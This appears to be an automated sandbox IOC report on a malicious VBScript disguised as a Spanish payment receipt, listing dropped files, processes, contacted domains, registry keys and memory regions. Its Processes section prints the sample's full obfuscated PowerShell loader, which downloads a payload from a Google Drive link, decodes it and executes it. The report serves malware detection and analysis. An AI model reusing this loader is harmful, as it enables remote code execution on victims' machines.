IOC Report
JUSTIFICANTE DE PAGO.vbs

loading gif

Files

File Path
Type
Category
Malicious
JUSTIFICANTE DE PAGO.vbs
ASCII text, with very long lines (362), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22vcjhx5.fss.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s5izzs1v.z2z.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Somesthesia.Ske
HTML document, ASCII text, with very long lines (1692), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spiritusestes = 1;$civilisationen='Substrin';$civilisationen+='g';Function Ulnage($Roadless){$Havnebassinet=$Roadless.Length-$Spiritusestes;For($Kuldeblgerne=5; $Kuldeblgerne -lt $Havnebassinet; $Kuldeblgerne+=(6)){$anthracolithic+=$Roadless.$civilisationen.Invoke($Kuldeblgerne, $Spiritusestes);}$anthracolithic;}function Multiplikatorernes($Fngsledes){. ($Tythed) ($Fngsledes);}$unlogged=Ulnage '.ceanMSkalaoB silz An.oiTimeblRadiolBevisaUnflu/Broom5Cacod.Engen0Ba.dh oplsn(Bu,gaWEnligiBilspnEmiredDatafo r,mow Unins oilo Kab.lNSalonTBr.kk Anac1 lom0 Kret. litu0Plagi;Total Ing.aWViz.ri egalnCarci6F,ske4C rru;Robus bidrax Grou6,kaer4arve ;Ek,am Fodfsr Luntv bene:Heme,1 T,lm2m end1Maend.Progr0 un.e)Predr TranGPlatfeEkspacSpr skCreamo tect/ Stan2Vask.0 Midw1 Lecy0Opskr0Perso1 Tilr0Eksam1etabl Ka.keFInteri Rgelr LucieknoerfAssobo F.rtxEleme/Esthe1Nnned2Allia1Anmel.Frede0Galip ';$Zootechnician=Ulnage 'UbrudUBermusKo,ere,kiderBusti- TramAamitigGgerdeWeaponBe,tmtConv ';$Blikdaases93=Ulnage ' .etrh necttGrimitKashipJustssSnerp:Manaf/ udbl/i ddadfarverInkasiDegorv,xploeM,sra..kyftgCapo oFantooGuigngA.tralBlk peAller..ntrac Subdo Cha mElpid/ElenduTailocrek.m?censueContexFemetpVebogoBill.rChastt Form=Asymmd Fun.oMikrowtransnVirtulForstoFoliaa Syklda aly& Railiabri dTilfa=Overf1 PolykcozenXGreteT ndemNPr.staRotato EftexDoeglL SeklJHypotpBruskhWoodbfRetracS.indA Sa.mV ChucSO.ymplDataeYDise.x Nyt.VPersooUdloelIn.erDOv.rs7,alelHEnleauUndubHEnleah BuksKBimleCalarmJForv.XVidsy ';$Timbalernes=Ulnage 'Pa,ie> Read ';$Tythed=Ulnage ' vermist,tset,lsjxTyde. ';$Conidium='Historicize';Multiplikatorernes (Ulnage 'P,psiSVlteneSlnggtMeteo-Filr C Wil oKlaptn Lym.tReinseZincenmyliut Fu.d Hemic-SpiseP N.nraP.robtChickh.onde ugenTOp ev:Retab\SydafV RummiPsychcRettea .amirStrmp.Kro.stB,bylxUpliftLed n A.rom-BiogrVCaramaTekstlSer,iuPelseeDingt Dy de$RulleCMa ero SeminImpliiRampidletpai Gn.du spanmV.jto;.nher ');Multiplikatorernes (Ulnage ' hizaiU skifunme, twelv(Est at Dekoe ngodsSjlert micr-TomatpengjaaTingetCharthBusre AakanTBaloc:Boghy\LandzVFumeriPremoc Ko,sasitcor,alsa.SwotttAftgtx Casit Depo)Forbr{D.mpveGeorgxNeuroi EscatRest.}Bermm;Ptsa, ');$Germind = Ulnage 'Cledge SwatcSwingh Strao.deli Trin%Backsa PincpKlamppBelbsdKvadraReflet Mi maVolut%Sqush\De,erSG mmioForetmAmplieArchesBol,gtRemsehMicr.eFejl sInconiSpiriaBoros.M,resST,nerkTypiseOd.rl Pella&Ti sm& Hall Be pee N.ttcSawbohNontioDepre Fraso$incor ';Multiplikatorernes (Ulnage 'domin$ .tolgStje lIn,oroSkarpbMut naBlo,llSt ig:CerasN MuniuOmplal GraniPluggnKanoedUnmelkKarbuoH.rdemTaws.sFolketFr.dreS,urrnMotte=Jrgen(P.eudcdebr.mI,cludVrks. ommis/Mastec Foli Te.n$AmesiGMoolee Deicr.ninnm,seudiFi,kon bankd M.te)Ratla ');Multiplikatorernes (Ulnage 'Metop$H.insglgegulJulefoTrg,ebF.rmuaFortelDek.i:EndomPPost.cJvn,aeTeglbrNo ennKontreKant,=Kia.c$Cu geB SkralUngkaiCamankass,cd YorkaFla,kaSa.ansalmineplumbsSeven9Mis n3Magts. Bunds ,udep MagnlStu,ei FoshtDrosk(.anso$B,oncT S.rii Hal,mGra,ubDominaJuleflGodfreResorrDistrnMonete Gon,sSpad )Kolle ');$Blikdaases93=$Pcerne[0];Multiplikatorernes (Ulnage 'hyste$MejetgKa hilGenneoScapub kil,aMo erl odbo:AltdeF StillKegleaRealla Udfre num dCecomeAfflas Cu a=Emo,iNMarsie ,ecywSolec-Vok eOKri,kbGromwjSpokee Alp.cm telt est R,kniSChampyPlatisFiksptRespeeSolstmArthr.SaalsNVedlieDentitNivel.C,ppeWPissoeTroopb exogC .ndmlRubbeir.geneFertinR,abatOverk ');Multiplikatorernes (Ulnage 'Uns.c$ orkyFcornllLogisaFo,ocaAr heeRehabdKor,meIna.ssEdder.HalsyHNonnaeDe,okaLnmo,d OctoeNi rorMakahsC.chi[,efen$DirekZ Rehoo VaadoPav,lt orskeBatekcMa.keh Ul,mnKluppi.progcMyeloiQuinta KratnMonod]Intra=Stj,t$AlmiruIlystnWel cldehumoMaalegMacergZuluke .ecrdLgdsl ');$Afsbe=Ulnage 'Bi,isFVideolSpermaRensnaHulleeOutwrd Fu,deStabisSkr s.hymenDAur.doZ chiw solinSnk mlGuffao Pr raMiliedToldsF Troni StrolV.scue Fu,u(Ballo$TetraBRussilimproi U,cokFelind Dis,aUn,ola Cha.sR puneAabe,sGreen9 ,itz3Ene.r,,ngka$ Te.aSCompalMesenaAfgifvS.atuiSdmlkcPu.leiClarssAktivmGynec)Samm. ';$Afsbe=$Nulindkomsten[1]+$Afsbe;$Slavicism=$Nulindkomsten[0];Multiplikatorernes (Ulnage ',uper$ sentg TodalRemado ,emtbBroncaSkridlIndfr:OtterbTrillr vsavnmattieForbdrStagniGenang Du.itPorceiAmbitgAntipt Oret=Preme( emicTH.rtaePerfesQueuetviske-Ansl.PRgt baWhysutkonsehFrems Stvl$Dje aSDividl BeboaUd,mnvVe.stiCrittc phioila insCanalmAntig)Brnee ');while (!$brnerigtigt) {Multiplikatorernes (Ulnage 'Stvht$FlgesgambitlLip roSk,lpbAi,maanrc,elRodma:UndisUSjl,gn Sd,krStuk,eHarefeHexoslA.usts Vask=A.sor$brnebtFa.ulrSowe.u,arsveFinva ') ;Multiplikatorernes $Afsbe;Multiplikatorernes (Ulnage '.eddaSMetattTropiakontrrSvendtArmad-GenneS Salgl Coque SvineNegripSemic L,sa4Drosc ');Multiplikatorernes (Ulnage ' St,r$Sadelg GawklSheepo ZoanbJageraRejuvl Beta:Intrab VacirVitt nFeasie UdskrMarroiS.uthgpetertForhaiCtenogNicottStres=Ph.no( Go aT TrekeBlufrsO,dbotjudie- eviPSpiseaIndsktMellsh.lymp Afste$ ndhfSAlkyllNydamaRegervBrygniPregucauto.iE,katsuma,dm rav) Uncr ') ;Multiplikatorernes (Ulnage ' ,rom$Over g,minolOsteooAfganbPolysaUdstalTerme: chuPAnacrrT,anseHenleeOutwav adreaDresspRetshoAntiorMrkbaab.llitPe.arolys,nrRosin2Famil5Overw5Alon,=Perfi$C zsegGlsnil PoleoTilskbF,rroaSa dslVatic: uldkSFre nkSamk.iHoopslAfhjed Tnd.psuperaVolvodR,ekadRa.ioe Tomjs Log kMe tra DisklHelfalHetere Kavin SalgsFinan+Tomas+Doura% .uni$KompeP halac Intee GnomrIndslnSlgerereaff.RecescPhospol resuTu ann C aitAfter ') ;$Blikdaases93=$Pcerne[$Preevaporator255];}Multiplikatorernes (Ulnage 'Dis,i$ Prs gJenvrl S.fforesunb ,ndhaG.ardl Etho: RagoePreofxRappetFritieUnshrn AfsluZonataCimeltSel.pePomfrsLin.e Koord=Kunst LandsGUdsleeSomnitunapp-GoldrCG.nero.nrusnF,nget UdsteprobonChiddtLigni Disti$FideiSDurrylRosmuaAzotiv F,owi Ca bc S,ili nugssBromams,kke ');Multiplikatorernes (Ulnage 'P gna$HammegM,cedl .dlaoAdvarbnyctiaSprngl Thai:SortkJUniveu.lassnNowisgTubereSpo.tnAntar D.sm= Nati G nan[ ,ngsSamicryBrndesForvatKursueAssurmAntit.critiC Ejenoin,skn.atiivGlasbe Tet,rLollate.han] vera:Spe.t: OmdaF GuilrAd.lsoWhaurmTra,sBSkaftaDisarsMrsgeeStutt6amanu4Haa dSSlvsmt,nartrP,rceiBeraanA tisgSt.rt(,fsbn$MaijaeS,imlxH riztv loueCheckn ApotuBore,aMorget FredeBack,sHaema)Rekto ');Multiplikatorernes (Ulnage 'Kv li$ExcalgLipaelstatsoStamkbKapseadittel Gard:BatchFKvienoGaranr dfylmOr.adi J.rln BrowdLeaves Mungk L,moeAbortdOutrieNedsksTill. Ba,sk=flako Opsp[S.oroSsubcayR,mblsTafiat wargestemmmGdann. FilaT.tivkePursuxAger,tUigen.Su.phESk,ffnObskuc GardoOverbd etriTropin Petegsigte] Unco:Sfyrb:Sub oAFane,SAnnitC.tykpICo.meIMento. NaioG telteDissotBrintSVidnet Regnr,mpori ayinnGaiasgRing (Ach.n$NonexJSusp.uBatisnRick gCaj.teL.dlenConvo) egre ');Multiplikatorernes (Ulnage 'F.age$Te.reg Frikl UdenoKos.eb IldfaExtralNonig:sminkcMenarhlin,oeGor lcUfuldkOutruhAra ieLarmefrhabdtCun,ieWittitFrems=Preco$ multFCurcuoG anirInfiemBearii StubnFlovpd StiksDelp.kTot.ee Vidtd Yu,eeFablesDesta. Pe,isF lthuSkillbHerlisPolyctFo slr ForhiFor,in ThyrgOptic( Spec2Ickin9Hotel7Inc,m6Forbr8Asphy4deute,Siksa2Civ l8Phyll0Unind8 In.v1Riste)Bykva ');Multiplikatorernes $checkheftet;"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Somesthesia.Ske && echo $"

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
https://go.micro
unknown
malicious
https://www.google.com
unknown
http://nuget.org/NuGet.exe
unknown
http://drive.usercontent.google.com
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://drive.googP
unknown
https://drive.google.com
unknown
https://drive.usercontent.googh
unknown
https://drive.usercontent.google.com
unknown
http://drive.google.com
unknown
https://aka.ms/pscore68
unknown
https://apis.google.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
There are 9 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
drive.google.com
142.250.101.100
drive.usercontent.google.com
142.251.2.132

IPs

IP
Domain
Country
Malicious
142.251.2.132
drive.usercontent.google.com
United States
142.250.101.100
drive.google.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1FF5BC70000
heap
page read and write
1FF6DBFD000
trusted library allocation
page read and write
E3474FE000
stack
page read and write
E3470FE000
stack
page read and write
1FF5DE2A000
trusted library allocation
page read and write
1FF5F8C4000
trusted library allocation
page read and write
7FFD9B910000
trusted library allocation
page execute and read and write
1FF5FAE6000
trusted library allocation
page read and write
7FFD9B960000
trusted library allocation
page read and write
23079D40000
heap
page read and write
23079DE9000
heap
page read and write
1FF75E17000
heap
page execute and read and write
23079E2F000
heap
page read and write
23079E4A000
heap
page read and write
7FFD9B753000
trusted library allocation
page execute and read and write
1FF5D630000
heap
page read and write
B62B6FF000
stack
page read and write
23079DEB000
heap
page read and write
1FF75DD0000
heap
page read and write
1FF5F4FF000
trusted library allocation
page read and write
1FF5DE20000
trusted library allocation
page read and write
1A8F8ED0000
heap
page read and write
1FF75C49000
heap
page read and write
1FF75F5E000
heap
page read and write
D1A3FF000
unkown
page read and write
23079DFA000
heap
page read and write
1FF75CE5000
heap
page read and write
1FF5DE4D000
trusted library allocation
page read and write
1FF5BB90000
heap
page read and write
1FF5BD80000
heap
page read and write
7FFD9BA10000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page read and write
23079D70000
heap
page read and write
7FFD9B90A000
trusted library allocation
page read and write
23079E2F000
heap
page read and write
1FF5D640000
trusted library allocation
page read and write
1FF5BF75000
heap
page read and write
1FF5DE39000
trusted library allocation
page read and write
B62B1FF000
stack
page read and write
1FF6D901000
trusted library allocation
page read and write
23079DEA000
heap
page read and write
23079E2F000
heap
page read and write
7DF448480000
trusted library allocation
page execute and read and write
1FF5ECD1000
trusted library allocation
page read and write
1FF5D590000
heap
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
1FF6DAB6000
trusted library allocation
page read and write
1FF75C54000
heap
page read and write
1A8F8CE0000
heap
page read and write
2307A04B000
heap
page read and write
23079E1B000
heap
page read and write
E34707E000
stack
page read and write
7FFD9BA40000
trusted library allocation
page read and write
E346EFE000
stack
page read and write
23079E4A000
heap
page read and write
23079E0C000
heap
page read and write
1FF5DEA4000
trusted library allocation
page read and write
1FF5BD21000
heap
page read and write
E3471F7000
stack
page read and write
E34737E000
stack
page read and write
1FF75CB7000
heap
page read and write
23079D98000
heap
page read and write
1FF5F936000
trusted library allocation
page read and write
2307BC8D000
heap
page read and write
B62AEFF000
stack
page read and write
7FFD9BA20000
trusted library allocation
page read and write
7FFD9B7AC000
trusted library allocation
page execute and read and write
23079DF3000
heap
page read and write
2307A04E000
heap
page read and write
1FF5E2D1000
trusted library allocation
page read and write
23079E10000
heap
page read and write
1FF75C40000
heap
page read and write
1FF75CD0000
heap
page read and write
1FF5BCD0000
heap
page read and write
E346AA3000
stack
page read and write
1FF5F570000
trusted library allocation
page read and write
23079DF7000
heap
page read and write
23079DE9000
heap
page read and write
7FFD9B932000
trusted library allocation
page read and write
23079E2F000
heap
page read and write
7FFD9B75D000
trusted library allocation
page execute and read and write
1FF75F56000
heap
page read and write
1FF5BF70000
heap
page read and write
1FF5FB24000
trusted library allocation
page read and write
23079E64000
heap
page read and write
E346B2E000
stack
page read and write
1FF5BD93000
heap
page read and write
1FF75FAF000
heap
page read and write
1FF75D2C000
heap
page read and write
1FF5DE4F000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
1FF5BD5F000
heap
page read and write
1FF5D715000
heap
page read and write
1FF5D985000
trusted library allocation
page read and write
7FFD9B750000
trusted library allocation
page read and write
2307A040000
heap
page read and write
E346FFE000
stack
page read and write
1FF5D5C0000
trusted library allocation
page read and write
1FF5FB11000
trusted library allocation
page read and write
1FF5BCFD000
heap
page read and write
1FF5DE2D000
trusted library allocation
page read and write
7FFD9BA60000
trusted library allocation
page read and write
1FF75E20000
heap
page read and write
7FFD9BA80000
trusted library allocation
page read and write
1A8F9060000
heap
page read and write
1FF5F932000
trusted library allocation
page read and write
7FFD9B76B000
trusted library allocation
page read and write
23079E02000
heap
page read and write
1FF5F8B1000
trusted library allocation
page read and write
23079DEB000
heap
page read and write
1FF762A0000
heap
page read and write
1FF5FAFE000
trusted library allocation
page read and write
1FF5DB28000
trusted library allocation
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
1A8F8EF0000
heap
page read and write
1FF5F8EC000
trusted library allocation
page read and write
1FF5BC90000
heap
page read and write
1FF5DE3D000
trusted library allocation
page read and write
1FF5DE35000
trusted library allocation
page read and write
1FF5DEA0000
trusted library allocation
page read and write
1A8F8DF0000
heap
page read and write
1FF6D974000
trusted library allocation
page read and write
1FF5F52C000
trusted library allocation
page read and write
1FF5D724000
heap
page read and write
2307BC8C000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
1FF5FB0D000
trusted library allocation
page read and write
1FF5DFCA000
trusted library allocation
page read and write
1FF5D8F0000
heap
page execute and read and write
23079DF3000
heap
page read and write
1FF5D670000
trusted library allocation
page read and write
1FF75F20000
heap
page read and write
7FFD9BA00000
trusted library allocation
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
1FF75F84000
heap
page read and write
7FFD9B920000
trusted library allocation
page execute and read and write
1FF5BD1B000
heap
page read and write
E3473FE000
stack
page read and write
1FF5F53F000
trusted library allocation
page read and write
1FF75E41000
heap
page read and write
2307BC80000
heap
page read and write
B62B4FD000
stack
page read and write
7FFD9B836000
trusted library allocation
page execute and read and write
D1A4FF000
stack
page read and write
1FF5D5E0000
trusted library allocation
page read and write
1FF5F8D9000
trusted library allocation
page read and write
7FFD9BA90000
trusted library allocation
page read and write
1FF5BD16000
heap
page read and write
1A8F8CE8000
heap
page read and write
1FF5F72E000
trusted library allocation
page read and write
7FFD9B901000
trusted library allocation
page read and write
2307B930000
heap
page read and write
23079D90000
heap
page read and write
2307A045000
heap
page read and write
7FFD9B870000
trusted library allocation
page execute and read and write
1FF5F6B7000
trusted library allocation
page read and write
1FF5F4FC000
trusted library allocation
page read and write
E3472FB000
stack
page read and write
23079E14000
heap
page read and write
23079DB7000
heap
page read and write
23079E59000
heap
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
E346BEE000
stack
page read and write
B62B5FE000
stack
page read and write
23079DE1000
heap
page read and write
7FFD9B752000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
1FF5D600000
trusted library allocation
page read and write
1FF5BD61000
heap
page read and write
B62AB1A000
stack
page read and write
7FFD9B760000
trusted library allocation
page read and write
1FF5BDC3000
heap
page read and write
23079E3A000
heap
page read and write
2307A049000
heap
page read and write
23079E0A000
heap
page read and write
23079E72000
heap
page read and write
23079DF0000
heap
page read and write
23079E1B000
heap
page read and write
E347177000
stack
page read and write
23079E5E000
heap
page read and write
D1A2FD000
stack
page read and write
7FFD9B800000
trusted library allocation
page read and write
23079D50000
heap
page read and write
7FFD9B980000
trusted library allocation
page read and write
1FF5BD37000
heap
page read and write
B62B7FB000
stack
page read and write
1FF75FBE000
heap
page read and write
7FFD9B770000
trusted library allocation
page read and write
7FFD9B950000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
1FF5DE63000
trusted library allocation
page read and write
E346BAE000
stack
page read and write
E346F7D000
stack
page read and write
1FF75F50000
heap
page read and write
23079E5C000
heap
page read and write
1A8F8F10000
heap
page read and write
1FF75E10000
heap
page execute and read and write
2307A04E000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
23079DD0000
heap
page read and write
23079E4A000
heap
page read and write
1FF5DFA5000
trusted library allocation
page read and write
7FFD9BA70000
trusted library allocation
page read and write
1FF5F516000
trusted library allocation
page read and write
2307BC84000
heap
page read and write
1FF5D710000
heap
page read and write
1FF5FAEB000
trusted library allocation
page read and write
1FF5BCE7000
heap
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
7FFD9B754000
trusted library allocation
page read and write
23079DB8000
heap
page read and write
B62AFFE000
stack
page read and write
23079DEE000
heap
page read and write
1FF75D04000
heap
page read and write
1FF5BCF5000
heap
page read and write
1FF5D901000
trusted library allocation
page read and write
B62B2FF000
stack
page read and write
7FFD9B80C000
trusted library allocation
page execute and read and write
1FF75D40000
heap
page execute and read and write
7FFD9BAB0000
trusted library allocation
page read and write
2307A04E000
heap
page read and write
1FF6D910000
trusted library allocation
page read and write
1FF5FB01000
trusted library allocation
page read and write
1FF5BD65000
heap
page read and write
7FFD9B806000
trusted library allocation
page read and write
1FF5D63A000
heap
page read and write
E347F4E000
stack
page read and write
E347FCD000
stack
page read and write
1FF75E44000
heap
page read and write
E34757B000
stack
page read and write
E34747F000
stack
page read and write
1FF75F9A000
heap
page read and write
1FF75CC1000
heap
page read and write
23079E1A000
heap
page read and write
2307A048000
heap
page read and write
7FFD9B8F0000
trusted library allocation
page read and write
1FF5FB3E000
trusted library allocation
page read and write
23079DCD000
heap
page read and write
23079E2F000
heap
page read and write
1FF5D5F0000
heap
page readonly
23079DFF000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
23079DEB000
heap
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
1A8F9065000
heap
page read and write
23079DDD000
heap
page read and write
1FF75C8D000
heap
page read and write
1FF5E268000
trusted library allocation
page read and write
E347278000
stack
page read and write
E346E7E000
stack
page read and write
23079E11000
heap
page read and write
1FF6DBEE000
trusted library allocation
page read and write
23079E3C000
heap
page read and write
1A8F8CED000
heap
page read and write
23079E2F000
heap
page read and write
There are 246 hidden memdumps, click here to show them.